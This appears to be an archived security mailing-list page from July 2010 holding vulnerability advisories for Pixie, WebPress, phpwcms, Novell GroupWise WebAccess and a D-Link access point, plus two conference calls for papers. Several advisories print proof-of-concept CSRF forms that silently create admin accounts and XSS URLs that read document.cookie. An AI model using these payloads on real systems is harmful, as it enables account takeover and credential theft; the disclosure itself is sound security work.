input type=hidden name=title 
value='titlescriptalert(document.cookie)/script' /
input type=hidden name=alias value=home /
input type=hidden name=active value=1 /
input type=hidden name=contents value='page content here...' /
/form
script
document.main.submit();
/script





XSRF (CSRF) in Pixie

2010-07-15 Thread advisory
Vulnerability ID: HTB22470
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_pixie.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ ) 
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the user creating script to properly 
verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of 
the application, theft of cookie-based authentication credentials, disclosure 
or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is 
available:

form accept-charset=UTF-8 
action=http://host/admin/index.php?s=settingsamp;x=users; method=post 
name=main 
input type=hidden name=uname value=myusername  /
input type=hidden name=realname value=My Real Name /
input type=text name=email value=myem...@myemaildomain.com /
input type=hidden name=user_new value=Save /
input type=hidden name=privilege value=2 /
/form
script
document.main.submit();
/script





XSS vulnerability in WebPress

2010-07-15 Thread advisory
Vulnerability ID: HTB22479
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_webpress_1.html
Product: WebPress
Vendor: YWP ( http://www.goywp.com/ ) 
Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the 
admin_page_listings_entries_amd_form.php script to properly sanitize 
user-supplied input in range_listing_id variable. Successful exploitation of 
this vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, disclosure or modification of 
sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:


http://host/path/_system/listings/entries/_pages/admin_page_listings_entries_amd_form.php?range_listing_id=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Elisting_id=1






{PRL} Novell Groupwise Webaccess Stack Overflow

2010-07-15 Thread Francis Provencher
#

Application:   Novell Groupwise Webaccess Stack Overflow

Platforms:   Windows, Linux  Netware (GroupWise 7.0, 7.01, 7.02,
7.03x, 7.04, 8.0, 8.01x)

Exploitation:   Remote code execution

CVE Number:

Novell TID:  7006380

Author:   Francis Provencher (Protek Research Lab's)

WebSite:   http://www.protekresearchlab.com/


#

1) Introduction
2) Report Timeline
3) Technical details
4) The Code


#

===
1) Introduction
===

Novell, Inc. is a global software and services company based in
Waltham, Massachusetts. The company specializes in enterprise
operating systems, such as SUSE

Linux Enterprise and Novell NetWare; identity, security, and systems
management solutions; and collaboration solutions, such as Novell
Groupwise and Novell

Pulse.

Novell was instrumental in making the Utah Valley a focus for
technology and software development. Novell technology contributed to
the emergence of local

area networks, which displaced the dominant mainframe computing model
and changed computing worldwide. Today, a primary focus of the company
is on developing

open source software for enterprise clients.

(http://en.wikipedia.org/wiki/Novell)

#


2) Report Timeline


2010-05-27 Vendor Contact
2010-05-28 Vendor Response
2010-07-15 Patch  Release (Groupwise 8.0.2)


#


3) Technical details


The user Proxy feature of Novell GroupWise WebAccess is vulnerable to
a stack overflow exploit. An authenticated user could potentially
trigger and execute arbitrary code with Root or SYSTEM rigths on
compromise server. To overwrite the stack, 1294 byte have to been sent
to the user proxy feature.


#

===
4) The Code
===

This issue can be trigger manually;

a

The stack will be overwrite with 0x62626262




#
(PRL-2010-05)


XSRF (CSRF) in phpwcms

2010-07-15 Thread advisory
Vulnerability ID: HTB22476
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_phpwcms.html
Product: phpwcms 
Vendor: Oliver Georgi ( http://www.phpwcms.de/ ) 
Vulnerable Version: 1.4.5 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the phpwcms.php script to properly 
verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of 
the application, theft of cookie-based authentication credentials, disclosure 
or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is 
available:


form action=http://host/phpwcms.php?do=admins=1; name=m method=POST
input type=hidden name=form_newloginname value=aaa
input type=hidden name=form_newpassword value=aaa
input type=hidden name=form_newemail value=a...@example.com
input type=hidden name=form_newrealname value=
input type=hidden name=form_feuser value=2
input type=hidden name=form_active value=1
input type=hidden name=verification_email value=1
input type=hidden name=form_aktion value=create_account
input type=hidden name=Submit value=send+user+data
/form
script
document.m.submit();
/script





XSS vulnerability in WebPress

2010-07-15 Thread advisory
Vulnerability ID: HTB22478
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_webpress.html
Product: WebPress
Vendor: YWP ( http://www.goywp.com/ ) 
Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the 
admin_page_listings_lists_action.php script to properly sanitize 
user-supplied input in id_num_mod variable. Successful exploitation of this 
vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, disclosure or modification of 
sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:


http://host/path/_system/listings/lists/_pages/admin_page_listings_lists_action.php?id_num_mod=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Esubmit_action=Edit






ClubHack2010 CFP

2010-07-15 Thread ClubHack
:: Call For Paper ::
Mother of all Indian Hacker's Conferences ClubHack is now in its
fourth year and we again invite all the geeks  hackers around the
world to be a part of the same.

ClubHack2010 opens its CFP today. See http://clubhack.com/2010/cfp

We are expecting a good deep knowledge technical
presentations/demonstrations on topics from the world of Information
Security. These presentations are expected to be of 40 minutes each.
The schedule time for each presenter would be 50 minutes out of which
40 minutes are for the presentation  10 for the question-answer
sessions. We’d request you to submit the papers keeping the time
constraint in mind.

:: Event ::
Date: 3rd, 4th  5th December (As Usual the first weekend of December)
Place: Pune, India

We are also hosting the finals of Malcon at ClubHack2010, for more
information  CFP of malcon see http://malcon.org/

3rd December - Malcon workshop
4th December - Keynote by Bruce Schneier  Other talks
5th December - Malcon awards and Other talks
(Event plan may change in future)

:: Scope ::
(includes, but not limited to)
# Protocol / Application based vulnerability in networks and computers
# Firewall Evasion techniques
# Cloud Application Security
# Data Recovery and Incident Response
# Mobile Security (cellular technologies)
# WLAN and Bluetooth Security
# Analysis of malicious code
# Cryptography and Cryptanalysis
# Computer forensics
# Cyber warfare
# Open source hacking toolkit
# Cyber Crime  law
# Hardware mods

:: Exclusion ::
Sales Pitch


:: Deadlines ::
Opening: 15th July 2010
Abstract Submission: 30th October 2010
Announcement of selected papers: 5th November 2010
Full Paper Submission: 15th November 2010

:: Speakers' Privileges ::
Economic Return Ticket - from your nearest international airport to Pune
Accommodation (upto 4 days)
Local Tourism package (in Sahyadri Ranges, Western Ghat)
One extra ticket for the event
No other expenses as we are a not-for-profit group  finding sponsors
in India is tough :)

:: Sponsors ::
That reminds, if you are interested in supporting the event in any
possible way, please write to us spon...@clubhack.com

:: Other details ::
All other details are available at
Event website: http://clubhack.com/2010

:: Submission ::
Check submission details at http://clubhack.com/2010/cfp  send it to
c...@clubhack.com



Thanks
team ClubHack


-- 
This is a non-monitored alias, please do not reply directly.
Please send your mails to i...@clubhack.com


OWASP Appsec Germany Call for Papers

2010-07-15 Thread Tobias Glemser
Hi,

the German section of the Open Web Application Security Project (OWASP)
announces a for Presentations (CfP) for the third OWASP AppSec Germany
conference on the 20th of October 2010 in Nuremberg. The conference will
be held in parallel with the IT security exhibition. The conference is
primarily oriented toward a german speaking audience, but also
presentations in English are welcome. The OWASP AppSec Germany 2010 will
extend the range of typical security conferences with contributions
covering development, operation and test of web-based applications.

Please find the complete CFP including all details here (closes 01 August
2010):

http://www.owasp.org/index.php/OWASP_AppSec_Germany_2010_Conference#tab=Call_for_Papers_-_English_Version

Cheers

Tobias Glemser
Board Member German Chapter OWASP



IS-2010-006 - D-Link DAP-1160 formFilter buffer overflow

2010-07-15 Thread Cristofaro Mune
Security Advisory

IS-2010-006 - D-Link DAP-1160 formFilter buffer overflow



Advisory Information

Published:
2010-07-14

Updated:
2010-07-14

Manufacturer: D-Link
Model: DAP-1160
Firmware version: 1.20b06
  1.30b10
  1.31b01



Vulnerability Details
-

Public References:
Not Assigned


Platform:
Successfully tested on D-Link DAP-1160 loaded with firmware versions:
v120b06, v130b10, v131b01.
Other models and/or firmware versions may be also affected.
Note: Only firmware version major numbers are displayed on the
administration web interface: 1.20, 1.30, 1.31


Background Information:
D-Link DAP-1160 is a wireless access points that allow wireless clients
connectivity to wired networks.
Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2 supported.


Summary:
A buffer overflow condition can be triggered by setting URL filtering
for an overly long URL, leading to possible arbitrary code execution or
denial of service. Successful authentication is required in order to
exploit the vulnerability, but attackers can leverage other
vulnerabilities for achieving unauthenticated remote exploitation.


Details:
Changing the device configuration involves sending a properly formatted
POST request to the following URL:
http://IP_ADDR/apply.cgi?formhandler_func

where IP_ADDR is the device IP address and the formhandler_func is a
function, specific to the task to be accomplished, that will handle the
POST parameters present in the request body.

The formFilter() function can be used for applying specific filters to
the communication going through the Access Point, and is not accessible
through any of the links available on the device administration interface.
Nonetheless, the web page available at the following URL

http://IP_ADDR/adv_webfilter.htm

relies on such function for applying URL filters.

One of the functionalities formFilter function allows for is URL
filtering performed on a specific URL, submitted via the above mentioned
web page or by sending a properly formatted POST request.
The provided URL is copied on the stack in a fixed sizer buffer,
allowing for buffer overflow and possible arbitrary code execution with
root privileges, if an overly long URL is provided.

A successful authentication is required in order to be able to to
trigger the vulnerability, but an attacker may leverage DCC protocol and
authentication bypass vulnerability for achieving unauthenticated remote
exploitation.

Impacts:
Arbitrary code execution
Denial of service


Solutions  Workaround:
Not available



Additional Information
--
Timeline (dd/mm/yy):
17/02/2010: Vulnerability discovered
17/02/2010: No suitable technical/security contact on Global/Regional
website. No contact available on OSVDB website
18/02/2010: Point of contact requested to customer service
--- No response ---
26/05/2010: Vulnerability disclosed at CONFidence 2010
14/07/2010: This advisory


Additional information available at http://www.icysilence.org